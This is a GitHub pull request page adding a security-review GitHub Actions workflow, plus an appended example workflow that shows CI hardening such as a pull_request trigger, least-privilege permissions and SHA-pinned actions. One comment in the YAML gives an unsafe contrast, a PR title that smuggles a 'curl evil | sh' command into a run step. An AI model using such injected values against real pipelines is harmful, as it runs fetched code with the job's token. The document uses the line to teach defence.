ci: add Claude Code security review workflow for PRs to feature/darwin#49
Sarath1018 wants to merge 2 commits into
Adds a pull_request-triggered GitHub Actions workflow that runs an automated, security-focused Claude Code review on PRs targeting feature/darwin.

Hardening per the CI/CD security checklist:
- uses pull_request (not pull_request_target) so untrusted PR code never runs with secret access; forked PRs are skipped
- least-privilege permissions (contents:read; pull-requests/issues:write)
- auth via CLAUDE_CODE_OAUTH_TOKEN secret, no hardcoded credentials
- no untrusted github.event.* values interpolated into run: steps

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Pin anthropics/claude-code-action to the v1 commit SHA so a re-tagged or compromised tag can't silently change the action that runs with repo access.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
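The two commit messages above list the hardening properties but the page does not show the workflow file itself. The following is an added example workflow, not the file from this PR, that implements each point: the pull_request trigger, the fork skip, job-scoped least-privilege permissions, the OAuth token read from a secret, SHA-pinned actions, and the safe way to handle untrusted github.event.* values. The action input names (claude_code_oauth_token, prompt), the step layout and the prompt text are assumptions; `<commit-sha>` is a placeholder, not a real commit.

```yaml
# Added example (not this PR's file). Assumed action inputs; <commit-sha> is a
# placeholder for the commit each tag resolved to at pin time.
name: Claude Code security review

on:
  # pull_request, not pull_request_target: the job runs against the PR's merge
  # commit and, for forked PRs, receives no repository secrets at all, so
  # untrusted PR code never executes with secret access.
  pull_request:
    branches: [feature/darwin]
    types: [opened, synchronize, reopened, ready_for_review]

# Nothing granted at workflow level; the single job asks for exactly what it
# needs. There is deliberately no contents:write, so the review cannot push.
permissions: {}

jobs:
  security-review:
    # Skip forked PRs explicitly: on pull_request they would get an empty
    # token anyway, so fail closed and quietly instead of running a broken job.
    if: >-
      github.event.pull_request.head.repo.full_name == github.repository &&
      !github.event.pull_request.draft
    runs-on: ubuntu-latest
    permissions:
      contents: read        # read the diff
      pull-requests: write  # post review comments
      issues: write         # PR comments go through the issues comment API
    steps:
      - name: Check out PR head
        # Every third-party action pinned to a full commit SHA, never a tag.
        uses: actions/checkout@<commit-sha> # v4
        with:
          persist-credentials: false   # don't leave the job token in .git/config

      - name: Run Claude Code review
        uses: anthropics/claude-code-action@<commit-sha> # v1
        with:
          # Credential comes from a repository secret; nothing hardcoded.
          claude_code_oauth_token: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
          prompt: |
            Review this pull request for security defects only: injection,
            authentication and authorization gaps, secret handling, unsafe
            deserialization, and CI/CD configuration risks. Report findings
            with file and line references.

      # UNSAFE (shown only as the contrast, never do this):
      #   run: echo "Reviewing ${{ github.event.pull_request.title }}"
      # The title is attacker-controlled and is spliced into the script text
      # before bash runs it, so a title like   x"; curl evil | sh; echo "
      # executes with the job's token.
      #
      # SAFE: route untrusted values through env; bash then reads them as
      # data, not as script.
      - name: Log PR metadata safely
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
        run: |
          printf 'Reviewing PR #%s: %s\n' "$PR_NUMBER" "$PR_TITLE"
```

To find the commit to pin, run `git ls-remote https://github.com/anthropics/claude-code-action refs/tags/v1` and use the peeled `refs/tags/v1^{}` line if the tag is annotated: GitHub Actions pins to commit SHAs, and an annotated tag's own object SHA is not a commit. Keep the `# v1` comment beside the pin so tooling such as Dependabot can still tell which release the SHA corresponds to.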